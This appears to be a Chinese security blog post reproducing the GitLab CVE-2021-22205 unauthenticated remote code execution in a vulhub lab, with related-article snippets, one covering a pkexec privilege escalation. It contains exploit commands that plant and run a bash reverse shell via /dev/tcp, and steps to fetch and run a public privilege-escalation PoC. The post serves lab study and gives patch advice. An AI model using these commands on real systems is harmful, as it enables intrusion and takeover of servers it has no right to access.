【漏洞复现】CVE-2021-22205 GitLab 未授权RCE

最新推荐文章于 2024-08-12 09:52:23 发布
原创 最新推荐文章于 2024-08-12 09:52:23 发布 · 1.1k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CVE-2021-22205 #GitLab #未授权RCE

这篇文章详细介绍了GitLab 13.10版本中CVE-2021-22204漏洞的复现过程,包括漏洞原理、环境设置、POC利用和修复建议。通过未授权上传恶意图片触发任意代码执行,演示了如何利用这个漏洞获取权限。

0x00 漏洞简介:

漏洞出来第一时间,听漏洞浍测的朋友传来的情报,就及时给了POC,但一直没复现,只是简单看了文章,提到需要可以注册用户才能进行攻击,然后就感觉挺鸡肋,没有再继续看。

恰巧好基友涛子给我发来他复现的文章,看了看exp,感觉并没那么鸡肋,相反可以通过未授权进行权限的获取,正好自己也复现了一手,同时借用涛子的文章给大家展现了出来。

GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。

GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执

参考链接:

0x01 影响版本:

该漏洞影响以下GitLab企业版和社区版:11.9 <= GitLab(CE/EE)< 13.8.813.9 <= GitLab(CE/EE)< 13.9.613.10 <=GitLab(CE/EE)< 13.10.3本文复现版本:Gitlab CE 13.10.1

0x02 漏洞环境

建议内存>8

执行如下命令启动一个GitLab 13.10.1版本服务器:

git clone https://github.com/vulhub/vulhub.gitcd vulhub/gitlab/CVE-2021-22205/docker-compose up -d环境启动后,访问http://your-ip:8080即可查看到GitLab的登录页面。

0x03 漏洞复现

漏洞POC

https://github.com/Al1ex/CVE-2021-22205

漏洞验证

python CVE-2021-22205.py -v true -t http://Your IP:Port

命令执行:

反弹shell:

python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
这条语句意思是代表,将反弹shell命令写成sh脚本 到tmp目录下
python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "chmod +x /tmp/1.sh"
这条语句意思是代表,对写入成功的sh脚本加执行权限
python3 CVE-2021-2205.py -a true -t http://Your IP:port -c "/bin/bash /tmp/1.sh"
这条语句意思是代表,运行反弹shell脚本

0x04 修复方案

1、及时升级GitLab至最新安全版本

2、配置访问控制策略,避免受影响的GitLab暴露在公网

转载请注明:Adminxe's Blog » 【漏洞复现】CVE-2021-22205 GitLab 未授权RCE

CVE-2021-22205 GITLAB 未授权 RCE 漏洞
qq_32445755的博客
04-17 802
简介 GitLab是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。 漏洞利用 上工具 python3 poc import sys import requests from bs4 import BeautifulSoup requests.packages.urllib3.disable_warnings() def .
漏洞复现CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
李同學的安全圈
11-05 2614
0x01 漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
Gitlab 未授权RCECVE-2021-22205漏洞分析及排查
dayouzi的博客
08-11 1996
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。
gitlab 未授权rceCVE-2021-22205
YouthBelief的博客
11-11 3184
gitlab 未授权rceCVE-2021-22205gitlab 未授权rceCVE-2021-22205)0x01 漏洞描述0x02 影响范围0x03 漏洞复现查看帮助先用验证模式执行命令反弹shell0x04 漏洞修复 gitlab 未授权rceCVE-2021-22205) 0x01 漏洞描述 2021年4⽉15⽇,GitLab官⽅发布安全补丁更新修复了GitLab命令执⾏漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传⼊的图像⽂件的扩展名进⾏正确处理
CVE-2021-22205 GitLab 未授权RCE复现
weixin_46137328的博客
11-25 6542
0x00 漏洞简介GitLab是一款Ruby开发的Git项目管理平台。如11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻...
CVE漏洞复现-CVE-2021-22205 GitLab未授权 RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 1557
2021年4月15日,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响,CVSS评分为9.9。
2024年CentOS RHEL 系统更新安全补丁的方法_怎样升级red hat 补丁(2),网络安全音频面试
2401_84264244的博客
05-05 773
默认情况下, cron 任务被配置成了立即下载并安装所有更新,但是我们可以通过在 /etc/sysconfig/yum-cron 配置文件中把下面两个参数改为yes,从而改变这种行为。为了使来自 root@localhost 的通知能够通过邮件发送给同一账户(再次说明,你可以选择其他账户,如果你想这样的话),下面这些行也是必须的。安装完成以后,打开/etc/yum/yum-cron.conf,然后找到下面这些行内容,你必须确保它们的值和下面展示的一样。而其它的行保证了能够通知并自动下载、安装安全升级。
CVE-2021-22205——Gitlab 远程命令执行漏洞复现
热门推荐
LiBai'S BLOG
11-10 1万+
CVE-2021-22205Vuln Impact影响版本环境Fofa语法漏洞利用脚本反弹ShellEXP Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a .
CVE-2021-22205 GitLab 远程命令执行漏洞复现
ierciyuan的博客
07-30 5370
CVE-2021-22205 GitLab 远程命令执行漏洞复现。vulhub靶场+使用poc/exp测试利用。
漏洞复现】4. Gitlab exiftool远程命令执行漏洞CVE-2021-22205复现与分析
Zichel77的博客
03-21 2188
Gitlab是由Gitlab Inc.开发,基于网络的GIt仓库管理工具,且具有wiki和issue跟踪功能,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,通过Web界面进行访问公开的或私人的项目。2021年4月5日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞CVE-2021-22205)。
CVE-2021-22192:CVE-2021-22192靶场:未授权用户RCE漏洞
03-30
CVE-2021-22192 CVE-2021-22192靶场:未授权用户RCE漏洞 0x10靶场环境 0x20目录结构 CVE-2021-22192 ├── README.md ............... [此 README 说明] ├── imgs .................... [辅助 README 说明的图片] ├── gitlab .................. [Gitlab 容器的挂载目录] │ ├── Dockerfile .......... [Gitlab 的 Docker 构建文件] │ ├── config .............. [Gitlab 配置挂载目录] │ ├── data ................ [Gitlab 数据挂载目录] │ ├── logs ................ [Gitlab
CVE-2021-22205 GitLab 未授权RCE 复现
fly夏天的博客
03-11 5797
CVE-2021-22205 GitLab 未授权RCE 复现
GitLab 目录遍历漏洞复现(CVE-2023-2825)
0xSec
05-27 4369
GitLab 存在目录遍历漏洞,当嵌套在至少五个组中的公共项目中存在附件时,未经身份验证的恶意用户可以利用该漏洞读取服务器上的任意文件。
GitLab 远程命令执行漏洞复现及坑点解决——CVE-2021-22205
cfzy_2024的博客
03-27 1651
GitLab 没有正确验证传递给文件解析器的图像文件,攻击者可利用该漏洞在服务端进行远程命令执行,漏洞编号CVE-2021-22205
GitLab 远程命令执行漏洞复现(CVE-2021-22205)
Bird&Bird
12-02 4736
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞复现4.1、脚本复现4.1.1、下载利用脚本 一、漏洞描述 GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行,可执行系统命令。这是一个严重的问题。它现在在最新版本中得到缓解,漏洞编号CVE-2021-22205。 二、影响版本 11.9 <= GitLab(CE/EE)< 13.8.8 13.9 <= GitLab(CE/EE)< 13.9.6 13.10 <= GitLab(CE/EE)< 13
GitLab 远程命令执行漏洞复现CVE-2021-22205
weixin_59086772的博客
01-10 1487
雨笋教育小编今天分享我们工程师发布的关于GitLab 远程命令执行漏洞复现的一篇技术干货,分享给你们一起学习。 GitLab 官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,影响了从 11.9 开始的版本。 0x00漏洞描述 GitLa
漏洞复现-GitLab任意读取文件(CVE-2023-2825)
玄道的网安博客
08-12 1766
据悉,该漏洞影响 GitLab社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。该漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。因此,我们需要先绕过nginx,一旦通过了校验,nginx会将未经解码处理的URL传递给Workhorse。分析nginx的代码后,不难发现在处理复杂的URI时,nginx会对URL编码的部分进行解码。
cve-2021-22205复现
m0_58606546的博客
11-24 1132
漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提供了一
vulhub复现CVE-2021-4034
最新发布
08-27
CVE-2021-4034 是一个影响 Linux 系统的严重本地提权漏洞,涉及 Polkit 的 pkexec 组件。该漏洞允许低权限用户通过构造特定参数调用 pkexec 以实现本地提权,从而获得 root 权限。Vulhub 平台通常提供现成的 Docker 环境用于复现漏洞。 以下是在 Vulhub 中复现 CVE-2021-4034 漏洞的具体步骤: ### 准备环境 1. 确保系统中已安装必要的依赖环境,包括: - Docker - Docker Compose 2. 下载 Vulhub 项目到本地: ```bash git clone https://github.com/vulhub/vulhub.git ``` 3. 进入 CVE-2021-4034 漏洞目录: ```bash cd vulhub/CVE-2021-4034 ``` ### 启动漏洞环境 1. 使用 Docker Compose 构建并启动容器: ```bash docker-compose up -d ``` 2. 检查容器是否成功运行: ```bash docker ps ``` 应该能看到一个名为 `cve-2021-4034` 的容器正在运行。 ### 验证漏洞存在性 1. 进入容器内部: ```bash docker exec -it cve-2021-4034 /bin/bash ``` 2. 在容器中验证是否存在漏洞- 检查 pkexec 版本: ```bash pkexec --version ``` - 如果版本号低于修复版本(如 0.105),则系统存在漏洞。 ### 利用漏洞提权 1. 编写或下载漏洞利用脚本,例如使用公开的 PoC 脚本: ```bash wget https://codeload.github.com/berdav/CVE-2021-4034/zip/refs/heads/main -O CVE-2021-4034.zip unzip CVE-2021-4034.zip cd CVE-2021-4034-main ``` 2. 编译并运行漏洞利用代码: ```bash make ./cve-2021-4034 ``` 如果漏洞存在,代码运行后应获得 root 权限。 ### 验证提权成功 1. 检查当前用户权限: ```bash id ``` 输出显示当前用户已具有 root 权限,表明提权成功。 ### 修复建议 1. 升级系统中的 Polkit 包至修复版本(0.105 或更高): ```bash apt update && apt upgrade ``` 2. 验证升级后的 pkexec 版本: ```bash pkexec --version ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Adminxe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值